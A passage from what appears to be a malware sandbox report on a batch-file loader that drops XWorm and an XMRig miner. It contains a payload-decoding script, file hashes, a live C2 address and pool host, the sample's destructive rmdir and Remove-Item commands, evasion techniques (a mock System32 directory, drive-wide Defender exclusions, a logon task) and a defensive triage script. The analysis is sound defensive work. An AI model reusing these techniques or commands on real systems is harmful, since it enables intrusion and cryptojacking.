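        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try { $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    }
    finally { $aes.Dispose() }

    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    return ,$bytes
}

# The stub scans the batch file for the single line beginning with its marker and
# takes everything after the 20-character prefix.
$lines = [IO.File]::ReadAllLines($BatPath)
$hit   = $null
foreach ($p in $Profiles) {
    $line = $lines | Where-Object { $_.StartsWith($p.Marker) } | Select-Object -First 1
    if ($line) { $hit = $p; $data = $line.Substring($p.Marker.Length); break }
}
if (-not $hit) { throw "No known marker line in $BatPath; take marker, key and IV from its own stub first." }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$sha = [System.Security.Cryptography.SHA256]::Create()
$n   = 0
# Two payloads separated by '\'; '#' stands in for '/' and '@' for 'A'.
foreach ($chunk in $data.Split('\')) {
    $n++
    $b64    = $chunk.Replace('#', '/').Replace('@', 'A')
    $bytes  = Unprotect-LoaderBlob -Cipher ([Convert]::FromBase64String($b64)) -KeyB64 $hit.Key -IvB64 $hit.IV
    $dst    = Join-Path $OutDir ('{0}.payload{1}.bin' -f (Split-Path -Leaf $BatPath), $n)
    [IO.File]::WriteAllBytes($dst, $bytes)
    $isPe   = $bytes.Length -gt 1 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A
    $digest = ([BitConverter]::ToString($sha.ComputeHash($bytes))) -replace '-', ''
    '{0}: {1} bytes, MZ header: {2}, SHA256 {3}' -f $dst, $bytes.Length, $isPe, $digest
}
$sha.Dispose()
```

Run it as .\Decode-LoaderBat.ps1 -BatPath C:\case\VCRedists.bat on an isolated analysis box; the written files are the raw assemblies the stub would have loaded, so treat them as live malware and hand them to a .NET decompiler rather than running them. The MZ check is only a sanity check that the key and IV matched; a wrong key shows up earlier as a padding error from TransformFinalBlock.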
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5:    d85ba6ff808d9e5444a4b369f5bc2730
  SHA1:   31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    fa4ccbdfcb11c24ee92cce60311b2ed0
  SHA1:   e39c80b60e4b10037e510e833c94a2c219f7b0fd
  SHA256: c523d18014d2d23f267641c13645aac36ed557f7773667ac44f061145e9f4f27
  SHA512: 22174e30ae9a56abcb797025cde96b70b311e7b9a90f5004de2d4be998c6c12977e551c58d8702bff3190a80f6aef9f92e847a9f8efac18b7a2ce4bd8e7f6cf0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    a0cb52ecad11458881d7edfc499c4053
  SHA1:   eda74aa1fa1b46fdbf5befc3d9843e98eb06b02b
  SHA256: c96df62683d2b79ca4b1a97bcc247de6822a7bd8eb3f7de533caf198509a6f5b
  SHA512: 8a9c2126701b9324e5bb770b13673ba412445dc095a2c016234198d95111c28b96d2bef0172b43c34215824922d4ed5aa8707f8dc6f0535c1be5b0f506063467

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    97748f71ed95026706014e8524266292
  SHA1:   f60663ea2e2a778c57d07d9678fe04c79c3ff942
  SHA256: f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f
  SHA512: b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5:    77d622bb1a5b250869a3238b9bc1402b
  SHA1:   d47f4003c2554b9dfc4c16f22460b331886b191b
  SHA256: f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
  SHA512: d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5:    90b2459a6432f59ed2d225f7e4b77d96
  SHA1:   e9d41ca7105a28e987fadfd188438e08f1bde664
  SHA256: 3f9daee99f25633b64f3484dce77abf499c125d4072047368e933bf50d0b016b
  SHA512: 41f256166d406f2299f9cf8daf4ab08b0cda00782b15ad951c1f123a315147b9cb7c27ea963f4619ac891a6b77a99c4f5a4a4f5dd8c852f059ddd4013f6b59b6

C:\Users\Admin\AppData\Local\Temp\MLANG.dll
  Filesize: 122KB
  MD5:    0b62c554572e9d2dfc51b6367c34700f
  SHA1:   1a41693552101c650aeeffe9dc9f1c7f7553dd7b
  SHA256: b05a80ef8ad197ee36620655100e1fd4111ec946a9f012970da4c61d8da43ded
  SHA512: 765e2f686a74804063b1face147a2dfd4cac85fb8273b5b0ccbd7606e46fce9865d5bbeeca40af31a8b584dc0bba1ebc0ff3fa8c1993da08a4b09cd15a394ce9

C:\Users\Admin\AppData\Local\Temp\VCRedist.bat
  Filesize: 413KB
  MD5:    1dfa0a2035388952e2b5c841dfc5f595
  SHA1:   636cc89f8d661960324de4047f4281a6eb8ca37b
  SHA256: db117c7378bc5ac4c6acc296d07ce799d1bb4a12fac593c16c34e7ccc9d4fa6c
  SHA512: 6b1e7579c432743e4b7927835f02401341ce9fbc26f8f7edecbe95a1bb00c139ae392543d5603fe042c0b76beb1269a6168f1bb72ab6407ca1c505677059a320

C:\Users\Admin\AppData\Local\Temp\VCRedists.bat
  Filesize: 972KB
  MD5:    c86637644022012aaa6bbfbf8947f3a6
  SHA1:   94adf42f7d2a48be6ee33900596f918fc4d6c36d
  SHA256: 1253081538d614b09657b82e17be73f15a63bef1ac1c5d5383624954e0776f41
  SHA512: df80a94d7fcc1276b60849320ca530b6a5e11f4bfe7aaf816975d6aa0412c046c44df22e2d8914bd26076e698c70ce81adf1cb5c535ba76620b216c1955173e8

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ixp3rjd.wdw.ps1
  Filesize: 60B
  MD5:    d17fe0a3f47be24a6453e9ef58c94641
  SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows \System32\ComputerDefaults.exe
  Filesize: 80KB
  MD5:    d25a9e160e3b74ef2242023726f15416
  SHA1:   27a9bb9d7628d442f9b5cf47711c906e3315755b
  SHA256: 7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
  SHA512: bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
Memory dumps (PID-index-range-memory.dmp, size)
  memory/1980-26-0x000001B4541A0000-0x000001B454216000-memory.dmp    472KB
  memory/1980-31-0x000001B451B20000-0x000001B451B30000-memory.dmp    64KB
  memory/1980-32-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp    2.0MB
  memory/1980-33-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp    760KB
  memory/1980-34-0x000001B4544E0000-0x000001B454598000-memory.dmp    736KB
  memory/1980-138-0x000001B454640000-0x000001B4546E2000-memory.dmp   648KB
  memory/1980-139-0x000001B4546E0000-0x000001B4547E4000-memory.dmp   1.0MB
  memory/1980-140-0x000001B454820000-0x000001B454876000-memory.dmp   344KB
  memory/1980-141-0x000001B454880000-0x000001B4548CC000-memory.dmp   304KB
  memory/3248-6-0x000001BFCC9F0000-0x000001BFCCA12000-memory.dmp     136KB
  memory/3248-25-0x000001BFCCF10000-0x000001BFCCF54000-memory.dmp    272KB
  memory/3248-27-0x000001BFCCA20000-0x000001BFCCA30000-memory.dmp    64KB
  memory/3248-28-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp    2.0MB
  memory/3248-29-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp    760KB
  memory/3248-30-0x000001BFCCEC0000-0x000001BFCCF0E000-memory.dmp    312KB
  memory/3248-56-0x000001BFCD410000-0x000001BFCD428000-memory.dmp    96KB
  memory/3264-82-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp    2.0MB
  memory/3264-83-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp    760KB
  memory/4108-144-0x0000026C7FE70000-0x0000026C7FE90000-memory.dmp   128KB
  memory/4108-142-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-143-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-145-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-146-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-147-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-148-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-149-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-150-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
  memory/4108-151-0x0000000140000000-0x00000001407CF000-memory.dmp   7.8MB
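Analyst note. Taken together, the process tree and the dropped files give a short list of host artefacts to check on a suspected victim: the mock C:\Windows \System32 directory (trailing space after Windows) into which ComputerDefaults.exe was copied, with MLANG.dll as the DLL the Loads dropped DLL hit attributes to it; Defender path exclusions for C:\, D:\ and F:\; the logon task 'OneNote startup_str' executing C:\Users\<user>\AppData\Roaming\SCV.cmd at highest run level; AddInProcess.exe carrying XMRig arguments for rx.unmineable.com:3333; the batch droppers and SC.cmd in the user's Temp directory; and the XWorm C2 185.196.8.135:7000. The script below is an added example, not from the report or the sample: it checks each of these on a live host. Names, paths and addresses are the report's; the heuristics (which exclusions, task actions or ports count as suspicious) and the output format are the author's assumptions and will need tuning.

```powershell
# Added example, not from the report or the sample: host triage for the
# persistence and defense-evasion artefacts in this analysis. Run elevated.
$findings = New-Object System.Collections.Generic.List[string]

# 1. Mock "C:\Windows \System32" (trailing space). Test-Path and most tools
#    normalise the space away and answer for the real C:\Windows, so the check
#    goes through the \\?\ prefix, which turns that normalisation off.
$mock = '\\?\C:\Windows \System32'
if ([IO.Directory]::Exists($mock)) {
    $findings.Add('mock trusted directory exists: C:\Windows \System32')
    foreach ($f in [IO.Directory]::GetFiles($mock)) {
        $h = [System.Security.Cryptography.SHA256]::Create()
        $digest = ([BitConverter]::ToString($h.ComputeHash([IO.File]::ReadAllBytes($f))) -replace '-', '')
        $h.Dispose()
        $findings.Add("  $f sha256=$digest")
    }
}

# 2. Defender exclusions covering a whole drive (the sample adds C:\, D:\ and F:\).
foreach ($e in @((Get-MpPreference).ExclusionPath | Where-Object { $_ })) {
    if ($e -match '^[A-Za-z]:\\?$') { $findings.Add("Defender exclusion covers a whole drive: $e") }
}

# 3. The logon task, plus any task that runs a script from a user profile at highest run level.
foreach ($task in Get-ScheduledTask) {
    foreach ($a in $task.Actions) {
        $exe = [string]$a.Execute
        if (-not $exe) { continue }
        $fromProfile = $exe -match '(?i)^"?[A-Z]:\\Users\\[^\\]+\\AppData\\'
        $isScript    = $exe -match '(?i)\.(cmd|bat)"?$'
        if ($task.TaskName -eq 'OneNote startup_str' -or
            ($fromProfile -and ($isScript -or $task.Principal.RunLevel -eq 'Highest'))) {
            $findings.Add("scheduled task '$($task.TaskName)' runs $exe (RunLevel $($task.Principal.RunLevel))")
        }
    }
}

# 4. Miner hollowed into AddInProcess.exe: the genuine binary never takes pool arguments.
foreach ($p in Get-CimInstance Win32_Process -Filter "Name = 'AddInProcess.exe'") {
    if ($p.CommandLine -match '(?i)unmineable|--cpu-max-threads-hint|\s-o\s+\S+:\d+') {
        $findings.Add("AddInProcess.exe PID $($p.ProcessId) with miner arguments: $($p.CommandLine)")
    }
}

# 5. Dropped files, checked in every profile (the sandbox user was Admin; a victim's differs).
$dropNames = @('AppData\Local\Temp\VCRedist.bat', 'AppData\Local\Temp\VCRedists.bat',
               'AppData\Local\Temp\SC.cmd', 'AppData\Local\Temp\MLANG.dll', 'AppData\Roaming\SCV.cmd')
foreach ($profile in Get-ChildItem -Path 'C:\Users' -Directory) {
    foreach ($rel in $dropNames) {
        $full = Join-Path $profile.FullName $rel
        if (Test-Path -LiteralPath $full) { $findings.Add("dropped file present: $full") }
    }
}

# 6. Live connections to the XWorm C2 or to the C2/pool ports seen in the report.
#    Port-only matches are a weak signal and are kept here for triage, not alerting.
foreach ($c in Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue) {
    if ($c.RemoteAddress -eq '185.196.8.135' -or $c.RemotePort -in @(7000, 3333)) {
        $findings.Add("connection $($c.LocalAddress):$($c.LocalPort) -> $($c.RemoteAddress):$($c.RemotePort) PID $($c.OwningProcess)")
    }
}

if ($findings.Count -eq 0) { 'no indicators from this report found' } else { $findings }
```

Two of the sample's own commands show why check 1 matters: the tree contains both Remove-Item '\\?\C:\Windows \' and rmdir "c:\Windows \" /s /q, so the mock directory may already be gone by the time a host is examined; the scheduled task and the Defender exclusions are the artefacts that survive a clean-up, and the dropped SCV.cmd under Roaming is what the task re-runs at the next logon.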